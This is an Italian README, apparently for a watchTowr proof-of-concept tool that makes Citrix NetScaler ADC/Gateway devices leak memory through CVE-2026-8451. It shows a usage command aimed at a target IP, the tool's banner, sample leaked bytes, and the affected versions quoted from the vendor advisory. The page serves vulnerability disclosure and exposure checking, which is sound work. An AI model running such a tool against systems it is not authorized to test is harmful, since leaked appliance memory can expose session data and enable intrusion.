
Strumento di exploit Python per la vulnerabilità di overread della memoria CVE-2026-8451 Citrix Netscaler. Genera artefatti di rilevamento perdendo memoria dai dispositivi ADC/Gateway di destinazione per verificare l'esposizione.
Strumento generatore di artefatti di rilevamento per Citrix Netscaler overread!
Questo generatore di artefatti di rilevamento accetta un dispositivo Netscaler di destinazione e tenta di divulgare memoria tramite CVE-2026-8451.
Tutto ciò di cui ha bisogno è il sistema di destinazione. Includi il protocollo, ad esempio https://192.168.80.125.
Ecco un esempio di divulgazione di memoria:
$ python3 watchTowr-vs-Netscaler-CVE-2026-8451.py https://192.168.80.125
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Netscaler-CVE-2026-8451.py
(*) CVE-2026-8451 Citrix Netscaler memory overread Detection Artifact Generator
- Aliz (@alizTheHax0r) of watchTowr (@watchTowrcyber)
Leaked bytes:
00000000 f0 0d 90 74 3d ef be ad de 41 41 41 41 41 41 41 |...t=....AAAAAAA|
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
...
Secondo l'avviso del fornitore:
The following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerabilities:
NetScaler ADC and NetScaler Gateway 14.1 BEFORE 14.1-72.61
NetScaler ADC and NetScaler Gateway 13.1 BEFORE 13.1-63.18
NetScaler ADC FIPS BEFORE 14.1-72.61 FIPS
NetScaler ADC FIPS and NDcPP BEFORE 13.1-37.272
Per le ultime ricerche sulla sicurezza, segui il team di watchTowr Labs